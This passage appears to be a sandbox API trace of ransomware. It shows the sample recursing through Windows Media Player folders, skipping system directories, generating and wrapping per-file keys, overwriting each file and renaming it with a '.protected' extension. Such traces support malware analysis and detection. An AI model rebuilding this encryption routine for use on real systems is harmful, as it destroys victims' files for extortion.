(in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0093.880] CloseHandle (hObject=0xd8) returned 1 [0093.881] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.881] lstrcmpiW (lpString1="Media Player", lpString2="Windows") returned -1 [0093.881] lstrcmpiW (lpString1="Media Player", lpString2="Program Files") returned -1 [0093.881] lstrcmpiW (lpString1="Media Player", lpString2="Program Files (x86)") returned -1 [0093.881] lstrcmpiW (lpString1="Media Player", lpString2="$Recycle.bin") returned 1 [0093.881] lstrcmpiW (lpString1="Media Player", lpString2="System Volume Information") returned -1 [0093.881] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player") returned 57 [0093.881] lstrcmpW (lpString1="Media Player", lpString2=".") returned 1 [0093.881] lstrcmpW (lpString1="Media Player", lpString2="..") returned 1 [0093.881] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\*") returned 59 [0093.881] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.882] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.882] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.882] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.882] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.882] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.882] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\.") returned 59 [0093.882] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.882] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.882] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.882] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.882] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.883] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.883] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\..") returned 60 [0093.883] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.883] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.883] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.883] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="Windows") returned -1 [0093.883] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="Program Files") returned -1 [0093.883] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="Program Files (x86)") returned -1 [0093.883] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="$Recycle.bin") returned 1 [0093.883] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="System Volume Information") returned -1 [0093.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 82 [0093.883] StrStrIW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".protected") returned 0x0 [0093.883] lstrcmpW (lpString1="CurrentDatabase_372.wmdb", lpString2="RESTORE_FILES.txt") returned -1 [0093.883] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.883] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.884] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 82 [0093.884] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".txt") returned 0x0 [0093.884] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 82 [0093.884] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".rar") returned 0x0 [0093.884] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 82 [0093.884] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".zip") returned 0x0 [0093.884] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.888] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.888] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.889] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.889] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.890] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.890] CloseHandle (hObject=0x14c) returned 1 [0093.890] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.protected") returned 92 [0093.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb.protected")) returned 1 [0093.891] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.891] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="Windows") returned -1 [0093.891] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="Program Files") returned -1 [0093.891] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="Program Files (x86)") returned -1 [0093.891] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="$Recycle.bin") returned 1 [0093.891] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="System Volume Information") returned -1 [0093.891] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 73 [0093.891] StrStrIW (lpFirst="LocalMLS_3.wmdb", lpSrch=".protected") returned 0x0 [0093.891] lstrcmpW (lpString1="LocalMLS_3.wmdb", lpString2="RESTORE_FILES.txt") returned -1 [0093.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.893] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 73 [0093.893] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".txt") returned 0x0 [0093.893] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 73 [0093.893] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".rar") returned 0x0 [0093.893] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 73 [0093.893] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".zip") returned 0x0 [0093.893] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.897] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.897] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.898] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.898] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.905] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.905] CloseHandle (hObject=0x14c) returned 1 [0093.905] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.protected") returned 83 [0093.905] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb.protected")) returned 1 [0093.906] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.906] lstrcmpiW (lpString1="Sync Playlists", lpString2="Windows") returned -1 [0093.906] lstrcmpiW (lpString1="Sync Playlists", lpString2="Program Files") returned 1 [0093.906] lstrcmpiW (lpString1="Sync Playlists", lpString2="Program Files (x86)") returned 1 [0093.906] lstrcmpiW (lpString1="Sync Playlists", lpString2="$Recycle.bin") returned 1 [0093.909] lstrcmpiW (lpString1="Sync Playlists", lpString2="System Volume Information") returned -1 [0093.910] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned 72 [0093.910] lstrcmpW (lpString1="Sync Playlists", lpString2=".") returned 1 [0093.910] lstrcmpW (lpString1="Sync Playlists", lpString2="..") returned 1 [0093.910] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*") returned 74 [0093.910] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.910] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.910] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.910] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.910] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.910] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.910] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\.") returned 74 [0093.910] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.910] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.910] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.910] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.910] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.910] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.910] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.910] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\..") returned 75 [0093.910] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.910] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.910] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.910] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0093.910] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0093.910] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0093.910] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0093.911] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0093.911] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 78 [0093.911] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0093.911] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0093.911] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*") returned 80 [0093.911] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0093.911] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.911] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.911] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.911] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.912] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.912] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\.") returned 80 [0093.912] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.912] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.912] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.912] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.912] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.912] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.912] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.912] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\..") returned 81 [0093.912] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.912] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.912] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.912] lstrcmpiW (lpString1="00010C6E", lpString2="Windows") returned -1 [0093.912] lstrcmpiW (lpString1="00010C6E", lpString2="Program Files") returned -1 [0093.912] lstrcmpiW (lpString1="00010C6E", lpString2="Program Files (x86)") returned -1 [0093.912] lstrcmpiW (lpString1="00010C6E", lpString2="$Recycle.bin") returned 1 [0093.912] lstrcmpiW (lpString1="00010C6E", lpString2="System Volume Information") returned -1 [0093.912] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned 87 [0093.912] lstrcmpW (lpString1="00010C6E", lpString2=".") returned 1 [0093.912] lstrcmpW (lpString1="00010C6E", lpString2="..") returned 1 [0093.912] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*") returned 89 [0093.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0093.919] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.919] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.919] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.919] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.919] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.919] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\.") returned 89 [0093.919] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.919] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0093.920] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.920] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.920] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.920] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.920] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.920] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\..") returned 90 [0093.920] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.920] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.920] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0093.920] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Windows") returned -1 [0093.920] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Program Files") returned -1 [0093.920] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0093.920] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0093.920] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="System Volume Information") returned -1 [0093.920] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 122 [0093.920] StrStrIW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".protected") returned 0x0 [0093.920] lstrcmpW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0093.920] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0093.920] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0093.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0093.921] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 122 [0093.921] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".txt") returned 0x0 [0093.921] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 122 [0093.921] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".rar") returned 0x0 [0093.921] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 122 [0093.921] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".zip") returned 0x0 [0093.921] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x414, lpOverlapped=0x0) returned 1 [0093.945] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.945] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x414, lpOverlapped=0x0) returned 1 [0093.945] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.946] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0093.946] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0093.946] CloseHandle (hObject=0x158) returned 1 [0093.946] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.protected") returned 132 [0093.946] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.protected")) returned 1 [0093.948] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0093.948] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Windows") returned -1 [0093.948] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0093.948] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0093.948] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0093.948] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0093.948] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 124 [0093.948] StrStrIW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0093.948] lstrcmpW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0093.948] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0093.948] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0093.949] CreateFileW 